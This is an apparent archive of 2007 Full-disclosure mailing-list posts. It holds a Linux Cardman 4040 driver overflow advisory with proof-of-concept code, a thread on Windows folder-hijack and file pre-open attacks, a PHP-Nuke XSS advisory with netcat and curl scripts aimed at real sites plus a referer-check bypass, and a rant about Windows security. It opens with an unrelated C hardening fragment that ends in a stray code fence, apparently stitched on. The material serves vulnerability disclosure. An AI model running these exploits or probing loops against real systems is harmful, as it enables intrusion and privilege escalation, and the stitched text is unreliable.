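/* Hardened handler: refuse anything that does not fit before touching the buffer. */
ssize_t cmx_write_checked(struct cmx_dev *dev, const unsigned char *src, size_t count) {
    if (count > RW_BUFFER_SIZE)
        return -EMSGSIZE;
    memcpy(dev->mem, src, count);
    return (ssize_t)count;
}

/* Same rule on the read side: the length the device announces is untrusted. */
ssize_t cmx_read_checked(struct cmx_dev *dev, const unsigned char *from_device, size_t announced_len) {
    if (announced_len > RW_BUFFER_SIZE)
        return -EIO;
    memcpy(dev->mem, from_device, announced_len);
    return (ssize_t)announced_len;
}

/* Runs one constructed 520-byte request through both write handlers. Returns 1
 * when the unchecked path clobbers the guard and the checked path rejects the
 * request while leaving the guard intact. */
int demo_oversized_request(void) {
    unsigned char req[RW_BUFFER_SIZE + 8];
    struct cmx_dev dev;
    memset(req, 0x41, sizeof(req));

    cmx_dev_init(&dev);
    cmx_write_unchecked(&dev, req, sizeof(req));
    int unchecked_clobbered = !cmx_guard_intact(&dev);

    cmx_dev_init(&dev);
    ssize_t rc = cmx_write_checked(&dev, req, sizeof(req));
    int checked_safe = (rc == -EMSGSIZE) && cmx_guard_intact(&dev);

    return unchecked_clobbered && checked_safe;
}

/* A request that exactly fills the buffer must still be accepted unchanged. */
int demo_exact_fit(void) {
    unsigned char req[RW_BUFFER_SIZE];
    struct cmx_dev dev;
    memset(req, 0x42, sizeof(req));
    cmx_dev_init(&dev);
    ssize_t rc = cmx_write_checked(&dev, req, sizeof(req));
    return rc == RW_BUFFER_SIZE && cmx_guard_intact(&dev)
        && dev.mem[0] == 0x42 && dev.mem[RW_BUFFER_SIZE - 1] == 0x42;
}

int main(void) {
    printf("oversized request: unchecked overruns, checked rejects -> %s\n",
           demo_oversized_request() ? "yes" : "no");
    printf("exact-fit request accepted by checked handler -> %s\n",
           demo_exact_fit() ? "yes" : "no");
    return 0;
}
```

The check sits before the copy and compares the request against the buffer, not against the caller's own claims; the guard bytes show why the ordering matters, since in the unchecked model the overrun has already happened by the time anything could be validated.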
When calling write() with a buffer larger than 512 bytes, the driver's write buffer overflows, allowing the caller to overwrite EIP and execute arbitrary code with kernel privileges.

In the read() handler, there is a similar problem with data originating in the device. A malicious or buggy device sending more than 512 bytes can overflow the driver's read buffer to the same effect.

Of course, the write() vulnerability is only exploitable by users with direct or indirect write access to the cmx device special file. By default, direct access is limited to root. Therefore, one might think this is not an issue. However, unprivileged users may cause large indirect writes via userland daemons such as those provided by pcsc-lite or openct. Since "normal" APDUs are smaller than 512 bytes, this may not be an issue, but I haven't looked into the various ways to cause data to be written indirectly.

Furthermore, a system can be set up to allow access to the device for a special user or group in order to increase security by running the userland drivers without root privileges. In such a setup users with access to the device can escalate privileges or cause DoS.

PoC Code:
---------

/*
 * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
 * Copyright (C) Daniel Roethlisberger
 * Compass Security Network Computing AG, Rapperswil, Switzerland.
 * All rights reserved.
 * http://www.csnc.ch/
 */

/* Header names were stripped by the list archive; these are the ones the
 * calls below (open, write, printf, exit, strerror, errno) require. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>

int
main(int argc, char *argv[])
{
	int fd, i, n;
	char buf[8192];

	/* Fill the buffer with a 16-bit counter so the offset of every byte is
	 * recognisable:
	 *  0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f ...
	 * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
	 */
	for (i = 0; i < sizeof(buf); i += 2) {
		buf[i]   = (char)(((i/2) & 0xFF00) >> 8);
		buf[i+1] = (char) ((i/2) & 0x00FF);
	}

	if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
		printf("Error: open() => %s\n", strerror(errno));
		exit(errno);
	}
	/* A single write larger than the driver's 512-byte buffer. */
	if ((n = write(fd, buf, sizeof(buf))) < 0) {
		printf("Error: write() => %s\n", strerror(errno));
		exit(errno);
	}
	printf("%d of %zu bytes written\n", n, sizeof(buf));
	exit(0);
}

Workaround:
-----------

Patch available: http://lkml.org/lkml/2007/3/6/386

Timeline:
---------

Vendor Status:    Linux 2.6.21-rc3 contains the patch.
                  Omnikey will fix it in their next driver release.
Vendor Notified:  2007-02-05 (Harald Welte)
                  2007-02-06 (vendor-sec, Omnikey)
Vendor Response:  Will fix (Harald Welte, vendor-sec)
                  Will fix but not coordinate release schedule (Omnikey)
Embargo Until:    2007-03-06

--
Daniel Roethlisberger, Compass Security Network Computing AG
Glaernischstrasse 7, CH-8640 Rapperswil, Switzerland
Tel +41 55 214 41 77   Fax +41 55 214 41 61
daniel.roethlisberger at csnc.ch   http://www.csnc.ch/
PGP: D927 96F6 7266 1683 06CF F984 ACEC DBB0 6929 2CBA
Security Review - Penetration Testing - Computer Forensics

From 3APA3A at SECURITY.NNOV.RU Fri Mar 9 12:09:26 2007
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Fri, 9 Mar 2007 15:09:26 +0300
Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
In-Reply-To: <096A04F511B7FD4995AE55F13824B8332127F5@banneretcs1.local.banneretcs.com>
References: <1199291182.20070308225837@SECURITY.NNOV.RU> <096A04F511B7FD4995AE55F13824B8332127F5@banneretcs1.local.banneretcs.com>
Message-ID: <1708336246.20070309150926@SECURITY.NNOV.RU>

Dear Roger A. Grimes,

--Friday, March 9, 2007, 7:31:54 AM, you wrote to 3APA3A at SECURITY.NNOV.RU:

RAG> If Alice deletes Bob's folder (which she could do in some scenarios
RAG> because she has the write/modify permission) and re-creates it, she
RAG> becomes the Creator Owner and now Bob no longer has the ability to
RAG> set permissions on it.
As a folder owner Alice can give any permissions to Bob she wants.

RAG> If I take your strange assumptions, Bob could re-discover the newly
RAG> created folder that Alice made, just like she did (I mean if you make up
RAG> crap scenarios, why can't I), and do the same trick back to her.

He can, if he knows he must.

RAG> And Windows does have a umask-like function. It's called Creator Owner.
RAG> It's a well known SID, and the default permissions for it can be set so
RAG> that any granular permission you want can be set to be default.

I see nothing similar between Creator Owner and umask. BTW, the same
article explains why Creator Owner is not a 100% solution and why you
should not rely on Creator Owner in case of DFS replication.

RAG> Vista does have symbolic links, and Windows has supported Junction
RAG> Points (similar to symbolic links) since Windows 2000. The main
RAG> difference is that Junction Points could only point to local resources
RAG> and symbolic links can do remote resources as well.

Junction points are very close to Unix mounts; I see no likeness to
symbolic links. Junction points (and by default, symbolic links in
Vista) can only be created by administrators, which prevents symlink
attacks. And it's the right choice.

RAG> You've come up with some strange scenarios below, and in all cases I
RAG> could easily defeat the problem you are suggesting by using basic,
RAG> recommended, security settings.

"You never know what is enough unless you know more than enough."
                                                    William Blake

It's quite hard to defeat a threat without knowing it. I disagree with
you about "recommended security settings". I never saw "disconnect all
users and close access to the share" or "check you are still folder
owner before copying the data" in instructions on how to create a
file/folder with restricted access inside a public one. Or "xcopy /O
doesn't guarantee the file can not be accessed during the copy
operation" or "Do not rely on Creator Owner in case of replication".

RAG> Why do you spend your time coming up with such weird scenarios to
RAG> focus on?

Roger, have you ever used robocopy or xcopy /O? I'm not a security
columnist, I am a system administrator/engineer. For the last 10 years I
have developed and implemented a lot of corporate directory structures,
replications, and backup/restore policies for many very different
organizations. I explain mistakes I can personally make and sometimes
personally did (mixing secure and insecure data, implementing automatic
replication to unprotected folders, implementing data restore policies
where a user can ask the system administrator to restore some directory
structure to a user-accessible folder, etc). Maybe I'm the only dumb
person who makes mistakes like that, but most probably not. I call it
"properly placed rakes to step on".

RAG> You're obviously a creative guy with some Windows
RAG> security smarts.

Thanks.

RAG> Why not focus on more realistic scenarios with
RAG> more real-world use? There's plenty of them for us to focus on and
RAG> to try and solve.

Roger, of course next time I should concentrate on a single-packet
exploitable overflow in the IPv6 stack to interest InfoWorld readers. I
will not, because there is nothing interesting for me in searching for
yet another buffer overflow. Let other creative guys who are
professionals in vulnerability research dig it. They have tools, time
and money. For me, the most valuable vulnerability is one simple enough
to be exploited with notepad, because it can be noticed by everyone, but
was unnoticed for 10 years.

RAG> Roger

RAG> *****************************************************************
RAG> *Roger A. Grimes, InfoWorld, Security Columnist
RAG> *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...

3APA3A. MCSE/MCT since Windows NT 4.0.
RAG> *email: roger_grimes at infoworld.com or roger at banneretcs.com
RAG> *Author of Professional Windows Desktop and Server Hardening (Wrox)
RAG> *http://www.amazon.com/gp/product/0764599909
RAG> *****************************************************************

RAG> -----Original Message-----
RAG> From: 3APA3A [mailto:3APA3A at SECURITY.NNOV.RU]
RAG> Sent: Thursday, March 08, 2007 2:59 PM
RAG> To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk
RAG> Subject: Microsoft Windows Vista/2003/XP/2000 file management security
RAG> issues

RAG> This is an article I promised to publish after Windows
RAG> ReadDirectoryChangesW (CVE-2007-0843) [1] issue. It should explain why
RAG> you must never place secure data inside insecure directory.

RAG> Title: Microsoft Windows Vista/2003/XP/2000 file management security
RAG> issues
RAG> Author: 3APA3A, http://securityvulns.com/
RAG> Vendor: Microsoft (and potentially other vendors)
RAG> Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit
RAG> for Windows 2000 and different utilities.
RAG> Access Vector: Local
RAG> Type: multiple/complex (weak design, insecure file operations, etc)
RAG> Original advisory: http://securityvulns.com/advisories/winfiles.asp
RAG> Securityvulns.com news:
RAG> http://security.nnov.ru/news/Microsoft/Windows/files.html

RAG> 0. Intro

RAG> This article contains a set of attack scenarios to demonstrate security
RAG> weakness in few very common Windows management practices. Neither of the
RAG> problems explained is critical, yet combined together they should force
RAG> you to review your security practices. I can't even say
RAG> "vulnerabilities" because there is nothing you can call
RAG> "vulnerability". It's just something you believe is secure and it's not.

RAG> 1.1 Problem: inability to create secured file / folder in public one.
RAG> Attack: folder hijack attack

RAG> First, it's simply impossible with standard Windows interface to create
RAG> something secured in insecure folder.

RAG> Scenario 1.1:

RAG> Bob wishes to create "Bob private data" folder in "Public" folder to
RAG> place few private files. "Public" has at least "Write" permissions for
RAG> "User" group. Bob:

RAG>  I    Creates "Bob private data" folder
RAG>  II   Sets permission for folder to only allow access to folder
RAG>       himself
RAG>  III  Copies private files into folder

RAG> Alice wants to get access to folder Bob created. She

RAG>  Ia   Immediately after folder is created, deletes "Bob private
RAG>       data" folder and creates "Bob private data" folder again (or
RAG>       simply takes ownership under "Bob private data" folder if
RAG>       permissions allow). It makes Alice folder owner.
RAG>  IIa  Immediately after Bob sets permissions, she grants herself
RAG>       full control under folder. She can do it as a folder owner.
RAG>  IIIa Reads Bob's private files, because files permissions are
RAG>       inherited from folder

RAG> Alice can use "Spydir" (http://securityvulns.com/soft/) tool to
RAG> monitor files access and automate this process. As you can see, [1]
RAG> elevates this problem significantly.

RAG> This is not new attack. Unix has "umask" command to protect
RAG> administrators and users. Currently, Windows has nothing similar.
RAG> CreateFile() API supports setting file ACL on file creation (just like
RAG> open() allows to set mode on POSIX systems). ACL can be securely set
RAG> only on newly created files. This raises a problem of secure file
RAG> creation.

RAG> 1.2 Problem: Inability to lock / securely change permissions of already
RAG> created file
RAG> Attack: pre-open file/directory attack.

RAG> There are few classes of insecure file creation attack (attempt to
RAG> open existing file), exploitable under Unix with hardlinks or
RAG> symlinks. It's believed Windows is not vulnerable to these attacks
RAG> because

RAG>  I.   There are no symlinks under Windows. Symlink attacks are not
RAG>       possible.
RAG>  II.  Security information in NTFS is not stored as a part of
RAG>       directory entry, it's a part of file data. Hard link attacks are
RAG>       not possible.
RAG>  III. File locks in Windows are mandatory. It means, if one
RAG>       application locks the file, another application can not open
RAG>       this file, if user doesn't have backup privileges. It mitigates
RAG>       different file-based attacks.

RAG> There is at least one scenario where attacker can succeed without symbolic
RAG> link: to steal data written to file created without check for file
RAG> existence regardless of file locks and permissions.

RAG> Attack description: if attacker can predict filename to be written, he
RAG> can create file, open it and share this file for all types of access.
RAG> Because locking and permissions are only checked on file open,
RAG> attacker retains access to the file even if it's locked and its
RAG> permissions are changed to deny file access to attacker.

RAG> Exploit (or useful tool):
RAG> http://securityvulns.com/files/spyfile.c
RAG> Opens file, shares it for different types of access and logs changes,
RAG> keeping the file open.
RAG> Compiled version is available from http://securityvulns.com/soft/

RAG> Scenario 1.2.1:

RAG> Bob is now aware about folder hijack attack. He uses xcopy /O /U /S to
RAG> synchronize his files to newly created folder. xcopy /O copies
RAG> security information (ownership and permissions) before writing data
RAG> to file.

RAG> Alice uses "Spydir" to monitor newly created folders and files in
RAG> Bob's directory. She uses Spyfile to create spoofed files in target
RAG> directory and waits for Bob to run xcopy. Now, she has full control
RAG> under content of Bob's files despite the fact she has no permissions
RAG> to access these files.

RAG> In the same way directory content may be monitored by pre-opening
RAG> directory.

RAG> Scenario 1.2.2:

RAG> Enterprise directory structure is replicated every day to another
RAG> user-writable location in order to allow users to recover suddenly
RAG> deleted or modified files. xcopy or robocopy (from resource kit) is
RAG> used for replication. Attacker can hijack content of newly created
RAG> files in newly created folders.

RAG> Same problem may happen on archive extraction or backup restoration.

RAG> Vulnerable applications:
RAG>  xcopy (from all Windows versions),
RAG>  robocopy (Windows 2000 Resource Kit),
RAG>  different archivers
RAG>  backup restoration utilities

RAG> By default, xcopy warns user the file exists, unless /Y or /U key is
RAG> specified. But
RAG>  I.   /Y is always specified for replication
RAG>  II.  /Y can be specified via COPYCMD environment variable. COPYCMD
RAG>       environment variable can be created in autoexec.bat file.
RAG>       Different situations are possible, where autoexec.bat is writable by
RAG>       attacker, if:
RAG>       - Default Windows 2000 permissions are used or applied with domain
RAG>         policy [2].
RAG>       - One can try to re-create autoexec.bat using POSIX subsystem
RAG>  III. Neither xcopy nor other utilities warn user on existing
RAG>       directory. Pre-open directory attack will always succeed.

RAG> As you can see, [1] again dramatically elevates this problem.

RAG> 1.3 Problem: user can completely block access to the files
RAG> Attack: open file deletion
RAG> (including Windows file replication service DoS)

RAG> If a file is deleted while it's open, it is still present in file system
RAG> under its old name until close. Any operation on this file
RAG> (including attributes requests) fails, regardless of application
RAG> rights and permissions (including backup ones).

RAG> Exploit: use spyfile, delete file while it's spied. Now, without
RAG> closing spyfile, attempt any operation on this file (e.g. try to
RAG> find its ownership).

RAG> Scenario 1.3.1

RAG> Now Bob found a copy application to securely copy files. It deletes
RAG> old file before creating new one. But it fails if Alice tries to spy
RAG> on Bob's files, because attempt to delete file succeeds, but file
RAG> is still present and is unmanageable.

RAG> Scenario 1.3.2

RAG> Windows file replication service (FRS) is used to replicate data
RAG> between 2 public DFS folders to distribute load. Folder has
RAG> permissions:
RAG>  Everyone: Add & read
RAG>  Creator Owner: Full Control
RAG> Thus, Alice has no permissions to delete files created by Bob.
RAG> Replicated folder is available as a share on 2 different servers:
RAG> \\SERVER1\Share and \\SERVER2\Share. Bob is connected
RAG> to \\SERVER1\Share.

RAG> Alice uses "Spydir" to monitor files creation by Bob. Every time Bob
RAG> creates new file on \\SERVER1\Share, Alice uses spyfile to create
RAG> file with same name on \\SERVER2\Share. It effectively leads to FRS
RAG> collision. While trying to resolve collision, FRS fails to delete
RAG> file created by Alice and Bob's file is deleted (original file is
RAG> moved to special hidden folder only accessible by administrator).

RAG> Workaround: never try to use creator-owner based permissions in
RAG> replicated folders.

RAG> Again, [1] seriously escalates this problem.

RAG> 2. Conclusion:

RAG> It's simply impossible to securely create something in public folder.
RAG> At least DoS conditions are always possible.

RAG> Developers should not consider mandatory file locking as a security
RAG> feature.

RAG> Developers should care about secure file creation to store sensitive
RAG> information. CREATE_NEW should always be used and ACL should be set
RAG> with lpSecurityAttributes of CreateFile. No attempt to open existing
RAG> file should be made.

RAG> Never try to create secure folder in public one. If you are forced,
RAG> disconnect all users before this operation.

RAG> Never use replication, archive extraction or backup restore to
RAG> user-accessible folder.

RAG> Bob and Alice should finally marry.

RAG> 3.
RAG> Vendor:

RAG> All timelines are same with [1].

RAG> [1]. Microsoft Windows ReadDirectoryChangesW information leak
RAG> (CVE-2007-0843)
RAG> http://security.nnov.ru/news/Microsoft/Windows/ReadDirector.html
RAG> [2]. Windows 2000 system partition weak default permissions
RAG> http://securityvulns.ru/news2205.html

RAG> --
RAG> http://securityvulns.com/
RAG>          /\_/\
RAG>         { , . }     |\
RAG> +--oQQo->{ ^ }<-----+ \
RAG> |  ZARAZA  U  3APA3A   }  You know my name - look up my number (The
RAG> Beatles)
RAG> +-------------o66o--+ /
RAG>                     |/

-- 
~/ZARAZA
http://securityvulns.com/

From 3APA3A at SECURITY.NNOV.RU Fri Mar 9 12:40:04 2007
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Fri, 9 Mar 2007 15:40:04 +0300
Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
In-Reply-To: <013001c76201$2a4bd290$7ee377b0$@net>
References: <1199291182.20070308225837@SECURITY.NNOV.RU> <013001c76201$2a4bd290$7ee377b0$@net>
Message-ID: <1956737470.20070309154004@SECURITY.NNOV.RU>

Dear M. Burnett,

--Friday, March 9, 2007, 7:12:31 AM, you wrote to 3APA3A at SECURITY.NNOV.RU:

MB> 3APA3A, I just wanted to say that is very clever research you have done.
MB> It's true that this does require some re-thinking of security practices, but
MB> I don't think it's accurate to say it's impossible to secure a private
MB> folder in a public one--I believe there is a way to do it securely.

Of course, there is always a way to solve one specific problem. A
solution for problem #1 has problem #2. A solution for problem #2 has
problem #3.

MB> There are three basic attacks you described:

MB> 1. Attacker deletes a users' new folder then immediately re-creates it,
MB> establishing ownership of the folder
MB> 2. Attacker predicts filename, creates the file, then keeps it open for all
MB> access, retaining rights on the file
MB> 3.
MB> Attacker creates and deletes a file but keeps it open, denying any other
MB> access to that file.

And 4. By forcing an irresolvable replication collision on a DFS
replicated folder in conjunction with [3], an attacker can delete newly
created files (and probably folders, I did not test) created by another
user even in case of permissions like this:

Users: Add & read
Creator Owner: full control

(or something, doesn't matter).

MB> The last two attacks could be prevented by creating new files in a private
MB> folder that prevents others from creating files. However, item 1 could
MB> compromise the security of that folder when it is initially created. To
MB> prevent that situation you would need to make sure that, within a public
MB> directory, only the CREATOR OWNER can delete a folder, which I believe is
MB> the default setting.

MB> But, as you noticed, others can still delete that folder. There is a quirky
MB> thing in NTFS that allows users to delete subfolders and files without even
MB> having delete permissions on those files (see
MB> http://xato.net/bl/2007/01/04/pointless-permissions/). I think that if you
MB> set permissions on a folder that prevented users from deleting children, and
MB> only allowed CREATOR OWNER to delete new folders, when a user creates a new
MB> folder it will be secure, therefore protecting you from 2 and 3.

The problem with the replicated folder has no relation to NTFS
permissions. It's not the replication service itself, not the user who
deletes the file or folder, because of the collision. The attacker only
forces the collision situation. This can not be fixed by NTFS
permissions. Only the "Add" NTFS permission is required to remove
somebody's newly created file. For the replication service the attack
is:

1. Victim creates Folder
2. Attacker creates Folder with same name on different replication
   mirror and locks it.
3. Replication service detects collision and removes Folder
4. Attacker creates Folder again
5. Folder is replicated. Attacker is now folder owner.

MB> I haven't fully tested this to verify it, but I believe this would prevent
MB> all the scenarios you described, although a user could still prevent the
MB> initial folder creation if they could predict the filename.

As you can see, there is at least one situation where your assumption
is wrong, the case of DFS replication. Of course, it still can be solved
somehow, but who can guarantee it's impossible to find problem #5 in the
solution for problem #4?

MB> Nevertheless, these are still important issues that illustrate some of the
MB> confusion that the NTFS quirkiness leads to.

MB> Mark Burnett
MB> http://xato.net
MB> http://winblogs.security-feeds.com

-- 
~/ZARAZA
http://securityvulns.com/

From ascii at katamail.com Fri Mar 9 16:30:29 2007
From: ascii at katamail.com (ascii)
Date: Fri, 09 Mar 2007 17:30:29 +0100
Subject: [Full-disclosure] Php Nuke POST XSS on steroids
Message-ID: <45F18BA5.50500@katamail.com>

Php Nuke POST XSS on steroids

Name              Php Nuke POST XSS on steroids
Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and others
                  (partially verified)
Severity          Medium
Vendor            http://phpnuke.org/
Advisory          http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
Authors           Francesco `ascii` Ongaro (ascii at ush.it)
                  Stefano `wisec` di Paola (stefano.dipaola at wisec.it)
Date              20070307

I. BACKGROUND

Php Nuke is a CMS written in PHP. This advisory is just an example of how
to exploit an XSS on platforms that use anti-CSRF techniques, using the
import_request_variables() bypass.

II. DESCRIPTION

An XSS vulnerability exists in the handling of the query POST variable in
the Search function of the Downloads module. This is exploitable in
special conditions; you need:

- PHP >=4.0.7 <=5.2.1 to use the import_request_variables() trick
- register_globals off (doesn't work with globals on)
- Php Nuke 8 and others

III. ANALYSIS

Php Nuke 8.0 is vulnerable to an XSS on _POST; you can verify this using
the provided testsuite.
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8
#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

query=token<>token
TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv
--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open
token" method="post">

When you try to apply CSRF to this bug (e.g. you need a gateway page to
send the POST query) you'll notice that Php Nuke has a generic piece of
code in mainfile.php that prevents posting with a "wrong" referrer. Test
this with the following two testsuites:

--- >8 --- >8 --- >8 --- >8 --- testsuit1.sh --- >8 --- >8 --- >8 --- >8
#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

query=">
TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv
--- >8 --- >8 --- >8 --- >8 --- testsuit2.sh --- >8 --- >8 --- >8 --- >8
#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.evil.com/
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

query=">
TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv
--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

In the first case the attack will succeed because the referrer matches;
in the second the anti-off-domain-post check will block your attempt and
you'll get a message like:

Posting from another server not allowed!

It seems that other versions have this check too.
--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

for i in `cat urls.txt`; do
    echo $i
    curl -s "http://$i/modules.php?name=Downloads&d_op=search" \
         -d 'query=asd&query="token<"' \
         -e "www.tin.it" \
         -H "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1"
done; echo

http://XXXXopic.it/
Posting from another server not allowed!
http://XXXXnuke.org/
Posting from another server not allowed!
http://XXXXir.it/
Posting from another server not allowed!
http://XXXXesi.it/
Posting from another server not allowed!
http://XXXXoft.it/
Posting from another server not allowed!

--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

The initial part of mainfile.php can be synthesized as follows:

--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

// get php version
$phpver = phpversion();

// convert superglobals if php is lower than 4.1.0
if ($phpver < '4.1.0') {
    [..cut..]
}

// override old superglobals if php is higher than 4.1.0
if ($phpver >= '4.1.0') {
    [..cut..]
}

if (!ini_get('register_globals')) {
    @import_request_variables("GPC", "");
}

[..]

// Posting from other servers is not allowed
if ($_SERVER['REQUEST_METHOD'] == "POST") {
    if (isset($_SERVER['HTTP_REFERER'])) {
        if (!stripos_clone($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST']))
            die('Posting from another server not allowed!');
    } else
        die($posttags);
}

--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

So if globals are off, using the import_request_variables() trick we can overwrite the _SERVER array and bypass the check (yes, you can do a lot of other things too, this is just an example). Use this code to replicate the issue:

--- >8 --- >8 --- >8 --- >8 --- poc.sh --- >8 --- >8 --- >8 --- >8

#!/bin/bash
cat > testsuite.php << TOKEN
TOKEN

--- >8 --- >8 --- >8 --- >8 --- ------ --- >8 --- >8 --- >8 --- >8

$ curl "http://XXXX/hack-phpnuke8/testsuite.php"
GLOBALS 0
IM THE PAGE!
$ curl "http://XXXX/hack-phpnuke8/testsuite.php" -d "ima=post"
GLOBALS 0
No referer!

$ curl "http://XXXX/hack-phpnuke8/testsuite.php" -d "ima=post" \
       -e "www.tin.it"
GLOBALS 0
Posting from another server not allowed!

$ curl "http://ascii.asciinb.vlan.ush.it/hack-phpnuke8/testsuite.php" \
       -d "ima=post&_SERVER=evil" -e "www.tin.it"
GLOBALS 0
IM THE PAGE!

Doesn't this seem cyclic to you? stripos will return TRUE if the array element doesn't exist.

IV. DETECTION

Php Nuke 8.0 and others are affected, please test with the supplied testsuites.

You can download Php Nuke from here : )
https://secure.bmtmicro.com/servlets/Orders.ShoppingCart?CID=4&PRODUCTID=19850011

V. WORKAROUND

Turn globals on.

VI. VENDOR RESPONSE

Will fix, probably.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20070307 Discovery
20070308 What do you expect here?
20070309 Full disclosure

IX. CREDIT

Francesco 'ascii' Ongaro is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2007 Francesco 'ascii' Ongaro

Note: this exploit is DOUBLE LICENSED:

1. If you'll use it for personal and non-profit purposes you can apply GPL v2 and above.

2. In the case you plan to:
   a. use our code in any commercial context
   b. implement this code in your non-GPL application
   c. use this code during a Penetration Test
   d. make any profit from it
   you need to contact me in order to obtain a _commercial license_.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Regards,

Francesco `ascii` Ongaro
http://www.ush.it/

From hackbunny at reactos.com Fri Mar 9 02:15:50 2007
From: hackbunny at reactos.com (KJKHyperion)
Date: Fri, 09 Mar 2007 03:15:50 +0100
Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
In-Reply-To: <20070308203157.7972F1D8F32@supertolla.itapac.net>
References: <20070308203157.7972F1D8F32@supertolla.itapac.net>
Message-ID: <45F0C356.6020703@reactos.com>

3APA3A wrote:
> 2. Conclusion: [...]

hahaha. Seriously, the Windows security model is great and everything, but it has never been used consistently, _never_. It's an uphill battle.

Take privileges for example: 64-bit namespace and barely above a dozen have been defined; two were overloaded and one recycled; and still no way to create arbitrary privileges. So to implement capability checks you perform group membership checks or make creative use of ACLs. Or take default device security. Or how sandboxing inexplicably breaks SSPI, making it close to useless. Or the countless hard-coded ACLs that make the complexity of the whole thing so unjustified you wonder why they don't just go with an "is administrator" bit. Or the total coolness that is Safer, truly a few hooks short of a filesystem firewall, and how criminally underused it is.

Then there's the compatibility issues. PGP Desktop breaks sandboxing rather spectacularly (silent crashes in all sandboxed applications) because when its hook cannot open the shared memory object (created with whatever default ACL was specified for the PGPTray.exe process) it just tries to access the NULL pointer returned. Sandboxing breaks the language bar - shared memory woes again. It has the common decency of not crashing or worse, it just sorta limps along a little.
And the funny thing is, there _is_ a standard, documented way to perform access checks compatible with GUI security boundaries (it's not explicitly documented as such, but hey, we all come with a brain): all processes in interactive sessions receive a special group ("logon id") whose membership grants access to the display. It should be a _given_ for GUI hooks to use this mechanism, more so for GUI hooks developed by Microsoft - but the language bar developers amply proved to be a bunch of fucking cowboys anyway, and to Microsoft's credit they got it totally wrong in the Windows 2000 version of runas, but fixed it for Windows XP.

A long time ago I tried to advocate making all files in one's own user profile non-executable by default, as a basic protection measure, and like all the ideas I try to push, I dogfooded it extensively. It subtly breaks a lot of innocent programs.

Other than completely isolating users, you cannot get any realistic form of security. Isolating users from each other and from administrators is the only scenario that has consistently been implemented and recognized. The rest is a wasteland of abandoned technology and wishful thinking.

